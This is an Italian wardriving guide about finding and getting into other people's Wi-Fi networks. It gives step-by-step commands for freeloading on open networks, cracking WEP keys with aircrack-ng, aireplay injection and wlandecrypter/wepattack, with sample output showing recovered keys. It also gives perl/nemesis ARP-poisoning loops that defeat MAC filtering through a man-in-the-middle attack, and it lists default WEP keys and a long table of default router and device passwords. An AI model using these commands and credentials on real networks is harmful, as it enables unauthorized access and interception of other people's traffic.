Wardriving
Chi è un Wardriver?
- Wardriver è quell'uomo che se ne va ingiro, portatile alla mano a cercare connessioni wireless e ne traccia una mappa. Non importa l'uso che ne fa, se ci navigherà sarà un wardriver buono se attaccherà, decripterà o ingannerà la rete trovata, sarà + un hacker che un wardriver.
- Io consiglio di utilizzare un pc con linux e una scheda 802.11x con chip Atheros (madwifi). Solitamente D-Link Xtreme.
Scroccare internet
- una volta configurata la scheda, come ath0 (o eth1 eth7, wlan0 ecc. dipende dalla scheda e dalla distrib.)
siamo pronti per dare un'occhiata e wardriverare.
- diciamo alla scheda di agganciarsi a qualsiasi rete, qualsiasi canale.
iwconfig ath0 essid any channel 0
- scanniamo l'aria...
iwlist ath0 scanning
appariranno tutte le reti disponibili, ora bisogna scegliere la rete
- Prendiamo come esempio la rete wireless
iwconfig ath0 essid wireless
- se siamo connessi alla rete, vedremo il BSSID dell'acces point.
iwconfig ath0 ifconfig ath0 up
- la rete adesso è su , ma manca il livello IP, le opzioni sono 2
- chiedere un ip all'accespoint
dhclient ath0
- oppure scegliere delle reti a caso, partenda dalla + probabile:
ifconfig ath0 192.168.1.166
- oppure
ifconfig ath0 192.168.0.166
- oppure
ifconfig ath0 192.168.100.166
- oppure
ifconfig ath0 172.16.0.166
- oppure
ifconfig ath0 10.1.1.166
- una volta trovata la rete proviamo a fare u nping al router/access point
ping 192.168.1.1
- se ci ponga al ping, siamo connessi ed è probabile che riusciremo anche a navigare
- se non pinga, i motivi possono essere un numero molto alto
- Il router ha un firewall che blocca il ping
- il router ha impostata la sicurezza a livello MAC, una lista di schede di rete accettabili, e il blocco di tutte le schede non conosciute --> vedi + in basso:
- il router ha una WEP/WPA, password di protezione.
- mentre facevamo il comando di ping, il router si è misteriosamente spento, oppure si è persa la connessione per qualche fattore ambientale, hanno chiuso una finestra (di quelle vere) o qualcuno si è messo tra noi e l'antenna.
- non abbiamo azzeccato l'ip del router (di solito è il .1 di una rete, di solito..)
- la scheda non funziona
- la spina è attaccata?
- ecc..
Trovare reti all'infinito
- se hai un'antenna con cavo e vuoi provare a muoverla per migliorare la ricezione, il comando watch fa comodo.
#!/bin/sh iwconfig ath0 essid any watch 'iwlist ath0 scanning |grep -2 Channel'
Niente Paura della WEP
Aircrack
WLAN_39-1.cap è il file dove ho catturato i pacchetti
aircrack-ng -a1 -eWLAN_39 -b00:60:B3:FD:70:57 -m00:0E:35:07:38:B7 -s WLAN_39-1.cap
aircrack-ng -a 1 -m 00:16:0A:06:8B:B3 -b 00:16:0A:06:2A:9C -e "Sweex LW050" -s dump-w-1-ch-6-02.cap
Aircrack-ng 1.0
[00:00:17] Tested 13626 keys (got 904240 IVs)
KB depth byte(vote) 0 0/ 1 6E(1259008) F8(943360) 0A(937216) 99(935936) 89(935680) A0(934400) 38(932608) 78(932608) 73(930816) 1 0/ 1 69(1231616) 61(944640) 06(941824) C4(941312) 42(940544) 95(935936) 21(935424) E3(933632) 32(932352) 2 0/ 1 63(1238016) E6(945920) E7(944640) 4E(936192) D9(932608) 27(932352) 3E(932096) 93(931072) EE(931072) 3 0/ 1 6F(1248256) 63(938496) 6A(936704) 4D(936448) 92(934400) 60(932352) 25(931584) 6B(929792) E8(927488) 4 0/ 1 31(1227264) B4(947200) DF(943616) 7C(938752) 7B(934656) 30(931328) D9(929792) E5(929536) 0B(928256) 5 0/ 1 33(1232896) 7C(950528) 50(946688) 36(941824) E2(941568) 3F(938240) 89(937472) C1(933632) 68(933376) 6 0/ 1 35(1192192) 72(946944) FD(944128) CA(939776) 6B(938240) 81(935936) 97(933632) 4B(933376) 6D(932608) 7 0/ 1 38(1197824) EA(941312) C7(938240) 2A(935424) B4(934400) 85(932864) 79(930048) 4F(929536) F1(928512) 8 0/ 1 32(1180672) 43(946432) DF(940544) 2B(935680) 4D(934912) 1C(934144) 7A(933888) FB(933376) 98(931840) 9 0/ 1 33(1200128) A0(950016) 39(939520) C9(939264) B4(937984) 59(934912) 66(933376) 0A(932608) EE(932608) 10 0/ 1 7A(961024) 35(941824) 8F(941312) 06(938752) A7(935424) 23(934656) 08(933632) C3(933632) 24(933376) 11 3/ 1 AF(938496) 82(935936) 9C(934912) B1(934400) 11(932864) 1D(932608) 1B(931840) FC(931840) 40(930304) 12 0/ 1 34(1059824) 15(947576) 63(937100) EF(931872) 7D(930464) CE(929532) EC(928572) 9E(927728) D8(927612)
KEY FOUND! [ 6E:69:63:6F:31:33:35:38:32:33:35:38:34 ] (ASCII: nico135823584 ) Decrypted correctly: 100%
WPA
http://docs.alkaloid.net/index.php/Cracking_WEP_and_WPA_Wireless_Networks#WPA_Crackin
Generare traffico
- con aireplay si fa così:
aireplay ath0 -3 -b 00:11:95:9D:74:1C -h 00:90:96:65:E5:47 -a 00:11:95:9D:74:1C -e ADSL-WIRELESS
- Nel frattempo catturiamo con airodump:
airodump ath0 WLAN_11-1 6
L'output + o meno sarà:
BSSID PWR Beacons IP / # Data CH MB ENC ESSID 00:11:95:9D:74:1C 10 8595 101469 6 54 WEP ADSL-WIRELESS BSSID STATION PWR Packets ESSID 00:11:95:9D:74:1C 00:90:96:65:E5:47 -2 56435 ADSL-WIRELESS
AccessPoints WLAN_XX
- Ho ricevuto un router dalla mia compagnia telefonica con una wep impostata, ma ho perso il foglietto con la chiave... la troverò usando un programma chiamato wlandecrypter usato assieme a wepattack. Servirà anche airodump.
- vediamo che canale, che essid e che bssid (AP MAC) ha:
iwlist ath0 scan
- Catturo i pacchetti: (airodump "interfaccia_wifi" "output_file" "channel")
airodump ath0 WLAN_12 6
- aspetto fino a che non cominciano ad entrare pacchetti di dati ("Data"), poi quando cominciano a essere almeno una decina o un centinaio, premo Control-C per interrompere.
- adesso passo il file .cap che ha generato airodump e lo passo a wepcrack(airodump genera 2 file, un .cap con i pacchetti e un .txt con le informazioni sugli host e gli AP) wlandecrypter bssid essid | wepattack -f output_name.cap
wlandecrypter 00:60:B3:XX:70:XX WLAN_12 | wepattack -f WLAN_12.cap
- L'output sarà + o meno questo:
wlandecrypter 0.4 - (c) 2006 nilp0inter2k6_at_gmail.com ------------> http://www.rusoblanco.com <------------
[+] BSSID: 00:60:B3:77:77:77 [+] Modelo: Z-com [+] ESSID: WLAN_39 [+] Seleccionada salida estandar Extraction of necessary data was successfull! Founded BSSID: 1) 00 60 B3 FD 70 77 / Key 0 1 network loaded... Accepting wordlist data... key no. 10000: Z001349270F39 key no. 20000: Z0013494E1F39 key no. 30000: Z001349752F39 ++++++++++ Packet decrypted! ++++++++++ BSSID: 00 60 B3 44 44 44 / Key 0 WepKey: 5A 30 30 31 33 34 39 37 42 30 32 33 39 (Z0013497B0239) Encryption: 128 Bit time: 11.580097 sec words: 31492
Access Points SpeedTouccXXXXX / ThomsonXXXX
The default password is generated by an algorithm so, with a simple "while" you can get the password from the mac address and the ESSID , there is a software to do that or a website.
http://www.nickkusters.com/SpeedTouch.aspx
Filtraggio di MAC
- Questo sistema di protezione ha senso ma non troppo perché l'indirizzo univoco della scheda wifi può essere falsificato, per esempio si potrebbe copiare quello che usa l'utente della rete e farsi scambiare per amico dall'accespoint. Ecco come si fa:
- è necessario avere perl
- è necessario il programma nemesis
- anche uno sniffer serve, come tcpdump o meglio (+ visuale) ethereal e ethereal-gnome come interfaccia.
- sarà molto utile la tabella a pié di pagina, sulle password di fabbrica dei router e/o access points.
- immaginazione.
Trovare un indirizzo mac autorizzato:
- connettiamoci alla rete, anche se non riceviamo e non possiamo inviare pacchetti, basta che la scheda sia associata all'acces point (si vede il BSSID da iwconfig che è tipo un xx:xx:xx:xx:xx:xx....)
- apriamo il nostro sniffer, e cominciamo ad annotarci tutti gli indirizzi MAC che vediamo. Escludiamo quello della nostra scheda,
tcpdump -i ath0 -n -e -q ether host 00:01:38:4D:83:E9
- questo comando comincerà a stampare linee tate quanti pacchetti passano per l'interfaccia ath0 e che abbiano il mac address del mittente o ricevente = a "00:01:38:4d:83:e9"
14:49:26.143433 00:01:38:4d:83:e9 > 00:13:8f:a3:0c:07, IPv4, length 60: 212.35.207.11.80 > 192.168.1.82.36491: tcp 0 14:49:26.296083 00:01:38:4d:83:e9 > 00:13:8f:a3:0c:07, IPv4, length 379: 207.46.109.59.1863 > 192.168.1.82.45046: tcp 313 14:49:26.296126 00:13:8f:a3:0c:07 > 00:01:38:4d:83:e9, IPv4, length 66: 192.168.1.82.45046 > 207.46.109.59.1863: tcp 0
- vediamo che 00:01:38:4d:83:e9 comunica con 00:13:8f:a3:0c:07, quindi se questo non è il MAC della nostra scheda, possiamo prendelo come documento falso da usare con il router, con nemesis:
- MAC mia scheda 00:01:29:25:27:0e
- MAC router 00:01:38:4d:83:e9 -> IP 192.168.1.1
- MAC utente autorizzato router: 00:13:8f:a3:0c:07 -> IP 192.168.1.200
- ora bisogna creare un triango, ossia far credere al router che l'utente siamo noi e contemporaneamente all'utente che il router siamo noi. Questo è possibile generando un pacchetto che dica: 'sono il router e ho questo MAC(il nostro)' all'utente e 'sono l'utente e ho questo MAC(il nostro)' al router.
- parliamo con il router:
perl -e 'while(1){print "Deviando..\n"; system(" \ nemesis arp -v -r -d ath0 \ -S 192.168.1.200 -D 192.168.1.1 \ -h 00:01:29:25:27:0e -m 00:0B:6A:76:97:AF \ -H 00:00:61:74:68:30 -M 00:0B:6A:76:97:AF \ "); sleep 10; }'
- parliamo con l'utente:
perl -e 'while(1){print "Deviando..\n"; system(" \ nemesis arp -v -r -d ath0 \ -S 192.168.1.1 -D 192.168.1.200 \ -h 00:01:29:25:27:0e -m 00:13:8f:a3:0c:07 \ -H 00:01:29:25:27:0e -M 00:01:38:4d:83:e9 \ "); sleep 10; }'
- Questi comandi loopperanno all'infinito, vanno eseguiti in 2 terminali diversi oppure appiccicarli in una chiamata unica di perl, e il risultato sarà che tutto il traffico tra router e utente passerà per la nostra scheda. Così facendo possiamo preovare ad entrare nel router e aggiungere il nostro mac alla lista di "amici".
Defaults WEP Keys
- CIFRADO 64BITS:
FFFFFFFFFF 0000000000 0101010101 0202020202 0303030303 0404040404
- Netgear
Default WEP KEY1: 11 11 11 11 11 Default WEP KEY2: 20 21 22 23 24 Default WEP KEY3: 30 31 32 33 34 Default WEP KEY4: 40 41 42 43 44
- CIFRADO 128BITS:
FFFFFFFFFFFFFFFFFFFFFFFFFF 00000000000000000000000000 01010101010101010101010101
- Zyxel
64-bit WEP with 5 characters Key1= 2e3f4 Key2= 5y7js Key3= 24fg7 Key4= 98jui
- 64-bit WEP with 10 hexadecimal digits
('0-9', 'A-F') Key1= 0x123456789A Key2= 0x23456789AB Key3= 0x3456789ABC Key4= 0x456789ABCD
- 128-bit WEP with 13 characters
Key1= 2e3f4w345ytre Key2= 5y7jse8r4i038 Key3= 24fg70okx3fr7 Key4= 98jui2wss35u4
- 128-bit WEP with 26 hexadecimal digits
('0-9', 'A-F') Key1= 0x112233445566778899AABBCDEF Key2= 0x2233445566778899AABBCCDDEE Key3= 0x3344556677889900AABBCCDDFF Key4= 0x44556677889900AABBCCDDEEFF
Power, dBm and mW
thanks to [1]
Rule 1: The Rule of 3
If you raise the dBm value by “3″ you double the mW value:
0dBm = 1mW 3dBm = 2mW 6dBm = 4mW 9dBm = 8mW 12dBm = 16mW 15dBm = 32mW 18dBm = 64mW 21dBm = 128mW 24dBm = 256mW 27dBm = 512mW 30dBm = 1024mW (5GHz Band B legal limit) 33dBm = 2048mW 36dBm = 4096mW (5GHz Band C legal limit)
This also mean that if you lower the dBm value by “3″ you halve the mW value
Rule 2: The Rule of 10 If you raise the dBm value by “10″ you multiply the mW value by 10:
0dBm = 1mW 10dBm = 10mW 20dBm = 100mW 30dBm = 1000mW (5GHz Band B legal limit) 40dBm = 10000mW (Over the 5GHz Band C legal limit)
Yup you guessed it, if you lower the dBm value by 10 you divide the mW value by 10.
The above calculations aren’t exact, but they are typically accurate enough to get by on.
Default Passwords by Manufacturer
MFabbricante Modello OS Versione Login Password
3Com - 1.25 root letmein 3Com Super Stack 2 Switch Any manager manager 3Com AccessBuilder® 7000 BRI Any - - 3Com CoreBuilder 2500 - - - 3Com Switch 3000/3300 - manager manager 3Com Switch 3000/3300 - admin admin 3Com Switch 3000/3300 - security security 3com Cable Managment System SQL Database (DOSCIC DHCP) Win2000 & MS DOCSIS_APP 3com 3Com NAC (Network Access Card) - adm none 3Com HiPer ARC Card v4.1.x of HA adm none 3Com CoreBuilder 6000 - debug tech 3Com CoreBuilder 7000 - tech tech 3Com SuperStack II Switch 2200 - debug synnet 3Com SuperStack II Switch 2700 - tech tech 3Com SuperStack / CoreBuilder - admin - 3Com SuperStack / CoreBuilder - read - 3Com SuperStack / CoreBuilder - write - 3Com LinkSwitch and CellPlex - tech tech 3Com LinkSwitch and CellPlex - debug synnet 3com Superstack II 3300FX - admin - 3com Switch 3000/3300 - Admin 3com 3com 3comCellPlex7000 - tech tech 3Com Switch 3000/3300 - monitor monitor 3Com AirConnect Access Point n/a - comcomcom 3com Superstack II Dual Speed 500 - security security 3Com OfficeConnect 5x1 at least 5.x - PASSWORD 3Com SuperStack 3 Switch 3300XM - admin - 3com Super Stack 2 Switch Any manager manager 3Com SuperStack II Switch 1100 - manager manager 3Com SuperStack II Switch 1100 - security security 3com super stack 2 switch any manager manager 3Com Office Connect Remote 812 - root !root 3Com Switch 3000/3300 - admin admin 3COM OCR-812 - - - 3com - - - - 3com NBX100 2.8 administrator 0000 3com Home Connect - User Password 3Com OfficeConnect 5x1 at least 5.x estheralastruey - 3Com SuperStack II Switch 3300 - manager manager 3Com Superstack - - - ACC Routers - netman netman Acc/Newbridge Congo/Amazon/Tigris All versions netman netman Acc/Newbridge Congo/Amazon/Tigris All versions netman netman adaptec - - - - Adaptec RAID Storage Manager Pro All Administrator adaptec adtran tsu 600 ethernet module - 18364 - Adtran TSU 120 e - - ADTRAN Adtran TSU 120 e - - ADTRAN Aironet All - alcatel - - - - Alcatel 1000 ANT Win98 - - alcatel speed touch home - - - Alcatel/Newbridge/Timestep VPN Gateway 15xx/45xx/7xxx Any root permit Alcatel/Newbridge/Timestep VPN Gateway 15xx/ Any root permit Alcatel/Newbridge/Timestep VPN Gateway 15xx/ Any root permit Allied Tenysin R130 - Manager friend Alteon ACEswitch 180e (telnet) - admin blank Alteon Web Systems All hardware releases Web OS 5.2 none admin APC MasterSwitches - apc apc APC Any Firmware Pri apcuser apc Apple Network Assistant 3.X None xyzzy Apple Airport 1.1 none public Arrowpoint any? - admin system Ascend All TAOS models all admin Ascend Ascend Pipeline Terminal Server - answer - Ascom Timeplex Routers Any See notes - AT&T Starlan SmartHUB 9.9 N/A manager AWARD Any BIOS - AWARD_SW - Axent NetProwler manager WinNT administrator admin Axis NPS 530 5.02 root pass AXIS StorPoint CD100 4.28 root pass AXIS 200 V1.32 - admin - Axis 2100 Network Camera Linux (ETRAX root pass bay cv1001003 - - - bay - - - - Bay - - - - Bay / Nortel ARN 13.20 Manager (caps count !) - Bay Network Routers All - User - Bay Networks ASN / ARN Routers Any Manager Manager Bay Networks Baystack - - NetICs Bay/Nortel Networks Accelar 1xxx switches Any rwa rwa Bay/Nortel Networks Remote Annex 2000 Any admin IP address BEA Weblogic 5.1 system weblogic BEA - - - - bewan - - - - Bintec all Routers Any admin bintec Bintec - - - - Biodata BIGfire & BIGfire+ all - biodata Biodata all Babylon-Boxes all - Babylon Borland interbase - - - Borland Interbase Any politcally correct Borland/Inprise Interbase any SYSDBA masterkey BreezeCom AP10, SA10 BreezeNET PR - - BreezeCOM Station Adapter and Access Point 4.x - Super BreezeCOM - 3.x - Master BreezeCOM Station Adapter and Access Point 2.x - laflaf Brocade Silkworm - admin password Buffalo/MELCO AirStation WLA-L11 - root (cannot be changed) (no password by default) Cabletron any any -- -- Cabletron NB Series Any - inuvik49 Cabletron routers and switches * * blank blank Cayman 3220-H DSL Router GatorSurf 5. Any - celerity - - - - Chase Research Iolan+ - - iolan Cisco Any Router and Switch 10 thru 12 cisco cisco Cisco ConfigMaker Software any? n/a cmaker CISCO Network Registrar 3.0 ADMIN changeme CISCO N/A N/A pixadmin pixadmin Cisco routers Not sure...j - san-fran Cisco VPN 3000 Concentrator - admin admin Cisco Net Ranger 2.2.1 Sol 5.6 root attack cisco 1600 12.05 - - cisco 1601 - - - cisco - - - - cisco - - - - Cisco MGX * superuser superuser cisco 1601 - - - cisco - - - - Cisco - - - - cisco - - - - Cisco any aany IOS no default login no default password CISCO arrowpoint - - - cisco - - - - cisco - - - - cisco - - - - Cisco 2503 - - - Cisco - - - - cisco - - - - Cisco IDS (netranger) - root attack cisco - - - - cisco 1600 - - - CMOS BIOS - - - ESSEX or IPC Cobalt RaQ * Qube* Any admin admin Com21 - - - - Comersus Shopping Cart 3.2 Win 95/98/NT admin dmr99 Compaq Insight Manager - Administrator administrator Compaq Insight Manager - operator operator Compaq Management Agents All administrator none compaq - - - - copper mountain - - - - Coppercom - - - - Coyote-Point Equaliser 4 Free BSD eqadmin - Serial port only equalizer Coyote-Point Equaliser 4 Free BSD root - Serial port only - Coyote-Point Equaliser 4 Free BSD look - Web Browser only (Read a look Coyote-Point Equaliser 4 Free BSD touch - Web Browser only (Write touch Cyclades MP/RT - super surt D-Link DI-704 - - admin D-Link DI-701 2.22 (?) - - Dell PowerVault 50F WindRiver (E root calvin Dell PowerVault 35F - root calvin Dell Powerapp Web 100 Linux RedHat 6.2 root powerapp dell - - - - Digiboard Portserver 8 & 16 any root dbps DLink DI-206 ISDN router 1.* Admin Admin Dlink Dl-106 ISDN router - - 1234 DLink DL-701 Cable/DSL Gateway/Firewall - - year2000 Dlink DFE-538TX 10/100 Adapter Windows 98 - - dlink di704 - - admin DLink DI 106 winnt administrator @*nigU^D.ha,; Dupont Digital Water Proofer Sun Sparc any root par0t eci - - - - Efficient - - - - Elron Firewall 2.5c hostname/ip address sysadmin emai hotmail - - - Ericsson ACC - netman netman Ericsson (formerly ACC) Any router all netman netman Extended Systems ExtendNet 4000 / Firewall all Versions admin admin Extended Systems Print Servers - admin extendnet Extreme All Summits - admin - extreme black diamond - - - Extreme All All Admin - Flowpoint 144, 2200 DSL Routers ALL - password FlowPoint 144, 2200 DSL Routers ALL - admin Flowpoint 2200 - - Serial Num Flowpoint 2200 - - Serial Num fore - - - - Fore Systems ASX 1000/1200 6.x ami - Foundry Networks ServerIronXL Any - - fujitsu l460 - - - Future Networks FN 110C Docsis cablemodem Any - - gatway solo9100 win95 - - General Instruments SB2100D Cable Modem - test test gonet - - fast abd234 Hewlett Packard HP Jetdirect (All Models) Any none none Hewlett Packard MPE-XL - HELLO MANAGER.SYS Hewlett Packard MPE-XL - HELLO MGR.SYS Hewlett Packard MPE-XL - HELLO FIELD.SUPPORT Hewlett Packard MPE-XL - MGR CAROLIAN Hewlett Packard MPE-XL - MGR CCC Hewlett Packard MPE-XL - OPERATOR COGNOS Hewlett Packard MPE-XL - MANAGER HPOFFICE hp 4150 - - - hp - - - - IBM AS/400 - qsecofr qsecofr IBM AS/400 - qsysopr qsysopr IBM AS/400 - qpgmr qpgmr IBM NetCommerce PRO 3.2 ncadmin ncadmin IBM LAN Server / OS/2 2.1, 3.0, 4. username password IBM 2210 RIP def trade IBM DB2 WinNT db2admin db2admin IBM Lotus Domino Go WebServer (net.commerce edition) ANY ? webadmin webibm IBM AS400 Any QSECOFR QSECOFR IBM RS/6000 AIX root ibm IBM - OS/400 QSECOFR QSECOFR IBM AS400 - QSRVBAS QSRVBAS IBM AS400 - QSRV QSRV ibm as400 - - - IBM AS/400 OS/400 QUSER QUSER IBM AS/400 - - - IBM ra6000 AIX Unix - - IBM AIX - - - Imperia Software Imperia Content Managment System Unix/NT superuser superuser Intel 510T Any - admin Intel All Routers All Versions - babbit Intel All Routers All Versions - babbit Intel Intel PRO/Wireless 2011 Wireless LAN Access Point Any - Intel Intel wireless lan access Point - - comcomcom Ipswitch Whats up Gold 6.0 Windows 9x a admin admin janta sales 254 compaq janta sales janta211 janta sales 254 compaq janta sales janta211 Jetform Jetform_design - Jetform - Kawa - - - - LANCAST - - - - Lantronix LPS1-T Print Server j11-16 any system Lantronix MSS100, MSSVIA, UDS10 Any - system Lantronix LSB4 any any system Lantronix Printer and terminalservers - - system LGIC Goldstream 2.5.1 LR-ISDN LR-ISDN Linkou School - - bill bill Linkou School - - bill bill Linksys Cable/DSL router Any - admin Linksys BEFSR7(1) OR (4) Standalone R blank admin linksys - - - - Linksys BEFSR41 - (blank) admin Livingston Livingston_portmaster2/3 - !root blank Livingston Livingston_officerouter - !root blank Lucent Portmaster 2 - !root none Lucent Cajun Family - root root lucent Portmaster 3 unknown !root !ishtar Lucent Packetstar (PSAX) - readwrite lucenttech1 Lucent AP-1000 - public public lucent dsl - - - lucent - - - - macromedia freehand 9 - - MacSense X-Router Pro - admin admin mcafee - - - - microcom hdms unknowen system hdms Micron - bios - - Microrouter (Cisco) Any Any - letmein Microrouter (Cisco) Any Any - letmein Microsoft Windows NT All Administrator - Microsoft Windows NT All Guest - Microsoft Windows NT All Mail - Microsoft SQL Server - sa - Microsoft Windows NT 4.0 pkoolt pkooltPS Microsoft NT - - start MICROSOFT NT 4.0 free user user Microsoft Windows NT 4.0 admin admin MICROSOFT NT 4.0 free user user Microsoft - - - - microsoft - - - - Microsoft Ms proxy 2.0 - - - microsoft - - - - mICROSOFT - - - - Microsoft Key Managment Server Windows NT 4 - password Microsoft - - - - Motorola Motorola-Cablerouter - cablecom router Motorola Motorola-Cablerouter - cablecom router motorola cyber surfer - - - msdloto msdloto - - - msdloto - - - - Multi-Tech RASExpress Server 5.30a guest none Nanoteq NetSeq firewall * admin NetSeq NetApp NetCache any admin NetCache Netgaer RH328 - - 1234 Netgear RH348 - - 1234 Netgear ISDN-Router RH348 - - 1234 Netgear RT311 Any Admin 1234 Netgear RT314 Any Admin 1234 Netgear RT338 - - 1234 Netgear RT311/RT314 - admin 1234 netgear - - - - netlink rt314 - - - Netopia R7100 4.6.2 admin admin Netopia 455 v3.1 Netscreen NS-5, NS10, NS-100 2.0 netscreen netscreen NeXT - NeXTStep 3.3 me - Nokia - Telecom NZ M10 - Telecom Telecom Nortel Meridian 1 PBX OS Release 2 0000 0000 Nortel Contivity Extranet Switches 2.x admin setup Nortel Norstar Modular ICS Any **ADMIN (**23646) ADMIN (23646) Nortel Norstar Modular ICS Any **CONFIG (266344) CONFIG (266344) Nortel Networks (Bay) Instant Internet Any - - Northern Telecom(Nortel) Meridian 1 - - m1link Novell NetWare Any guest - Novell NetWare any PRINT - Novell NetWare Any LASER - Novell NetWare Any HPLASER - Novell NetWare Any PRINTER - Novell NetWare Any LASERWRITER - Novell NetWare Any POST - Novell NetWare Any MAIL - Novell NetWare Any GATEWAY - Novell NetWare Any GATE - Novell NetWare Any ROUTER - Novell NetWare Any BACKUP - Novell NetWare Arcserve CHEY_ARCHSVR WONDERLAND Novell NetWare Any WINDOWS_PASSTHRU - novell - - - - ODS 1094 IS Chassis 4.x ods ods Optivision Nac 3000 & 4000 any root mpegvideo Oracle 8i 8.1.6 sys change_on_install Oracle Internet Directory Service any cn=orcladmin welcome Oracle 7 or later - system manager Oracle 7 or later - sys change_on_install Oracle 7 or later Any Scott Tiger Oracle 8i all internal oracle oracle - - - - oracle - - - - oracle co. Database engines every sys change_on_install Osicom(Datacom) Osicom(Datacom) - sysadm sysadm Pandatel EMUX all admin admin PlainTree Waveswitch 100 - - default.password RapidStream RS4000-RS8000 Linux rsadmin rsadmin realtek 8139 - - - Remedy Any Any Demo - Research Machines Classroom Assistant Windows 95 manager changeme Rodopi Rodopi billing software 'AbacBill' sql database - rodopi rodopi Samba SWAT Package Linux Any Local User Local User password schoolgirl member - ich hci Securicor3NET Monet any manager friend Securicor3NET Cezzanne any manager friend SGI all all root n/a SGI Embedded Support Partner IRIX 6.5.6 Administrator Partner SGI IRIX ALL lp lp SGI IRIX ALL OutOfBox, demos, guest, 4DGifts (none by default) SGI IRIX ALL EZsetup - Shiva LanRover any? root - Shiva AccessPort Any hello hello Shiva Any? - Guest blank SMC Barricade - - admin soho nbg800 unknown admin 1234 Solaris - - - - sonic wall any firewall device admin password - SonicWall Any Firewall Device - admin password SpeedStream - - - - Spider Systems M250 / M250L - - hello Sprint PCS SCH2000 see notes Menu - 8 - 0 (see notes) 040793 Ssangyoung SR2501 - - 2501 Sun - SunOS 4.1.4 root - Sun - Solaris - - surecom ep3501/3506 own os admin surecom Symnatec - - - - SysKonnect 6616 - default.password - SysKonnect 6616 - default.password - Tekelec Eagle STP - eagle eagle Telebit netblazer 3.* - setup/snmp setup/nopasswd Terayon TeraLink Getaway - admin password Terayon TeraLink 1000 Controller - admin password Terayon TeraLink 1000 Controller - user password Terayon TeraLink Getaway - user password terayon - 6.29 admin nms Terrayon - - - - Titbas - SCO haasadm lucy99 TopLayer AppSwitch 2500 Any siteadmin toplayer Toshiba TR-650 V2.01.00 admin tr650 toshiba 480cdt - - - toshiba - - - - TrendMicro ISVW (VirusWall) any admin admin Trintech eAcquirer App/Data Servers - t3admin Trintech Ullu ka pattha Gand mara Gandoo Bhosda Lund USR TOTALswitch Any none amber Vina Technologies ConnectReach 3.6.2 (none) (none) voy - - - - WatchGuard FireBox 3-4.6 - wg (touch password) Webmin Webmin Any Unix/Lin admin - Webramp 410i etc... - wradmin trancell Win2000 Quick Time 4.0 Englisch - - Windows 98 se 98 se - - - Wireless Inc. WaveNet 2458 n/a root rootpass Xylan Omnistack 1032CF 3.2.8 admin password Xylan Omnistack 4024 3.4.9 admin password Xylan Omniswitch 3.1.8 admin switch xyplex mx-16xx - setpriv system Zyxel ISDN-Router Prestige 1000 - - 1234 zyxel prestige 300 series zynos 2.* - 1234 Zyxel ISDN Router Prestige 100IH - - 1234 Zyxel prestige 300 series any - - Zyxel prestige 600 series any - - ZYXEL 641 ADSL - - 1234 Zyxel prestige 128 modem-router any - 1234 Zyxel ISDN-Router Prestige 1000 - - - Zyxel ISDN-Router Prestige 1000 - - -
Spero siano utili a qualcuno
LOG
Nov/02/2006 15:38:05 Wireless PC connected 00-11-24-22-A9-AE